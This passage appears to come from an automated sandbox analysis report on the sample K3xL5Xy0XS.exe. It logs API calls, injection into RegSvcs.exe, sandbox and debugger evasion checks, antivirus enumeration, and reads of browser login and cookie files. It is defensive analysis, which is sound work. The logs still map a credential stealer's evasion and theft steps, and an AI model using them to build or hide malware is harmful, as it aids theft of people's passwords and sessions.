                  Source: Binary string: wntdll.pdb source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
                  Source: K3xL5Xy0XS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: K3xL5Xy0XS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: K3xL5Xy0XS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: K3xL5Xy0XS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: K3xL5Xy0XS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001C42DE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E0A76 push ecx; ret 0_2_001E0A89

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_001DF98E
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00251C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00251C41
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeAPI/Special instruction interceptor: Address: 168632C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2239Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7396Jump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeAPI coverage: 3.9 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0022DBBE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002368EE FindFirstFileW,FindClose,0_2_002368EE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0023698F
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0022D076
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0022D3A9
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00239642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00239642
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0023979D
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00239B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00239B2B
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00235C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00235C97
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001C42DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 5c
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0023EAA2 BlockInput,0_2_0023EAA2
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F2622
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001C42DE
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E4CE8 mov eax, dword ptr fs:[00000030h]0_2_001E4CE8
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_016865F8 mov eax, dword ptr fs:[00000030h]0_2_016865F8
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_01686598 mov eax, dword ptr fs:[00000030h]0_2_01686598
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_01684F78 mov eax, dword ptr fs:[00000030h]0_2_01684F78
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00220B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00220B62
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F2622
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001E083F
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E09D5 SetUnhandledExceptionFilter,0_2_001E09D5
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001E0C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 34E008Jump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00221201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00221201
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00202BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00202BA5
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0022B226 SendInput,keybd_event,0_2_0022B226
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_002422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_002422DA
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00220B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00220B62
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00221663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00221663
                  Source: K3xL5Xy0XS.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: K3xL5Xy0XS.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001E0698 cpuid 0_2_001E0698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_00238195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00238195
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_0021D27A GetUserNameW,0_2_0021D27A
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001FBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_001FBB6F
                  Source: C:\Users\user\Desktop\K3xL5Xy0XS.exeCode function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001C42DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.1890110482.00000000069B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: K3xL5Xy0XS.exe, 00000000.00000002.1707935052.0000000001594000.00000004.00000020.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1669566555.0000000001503000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
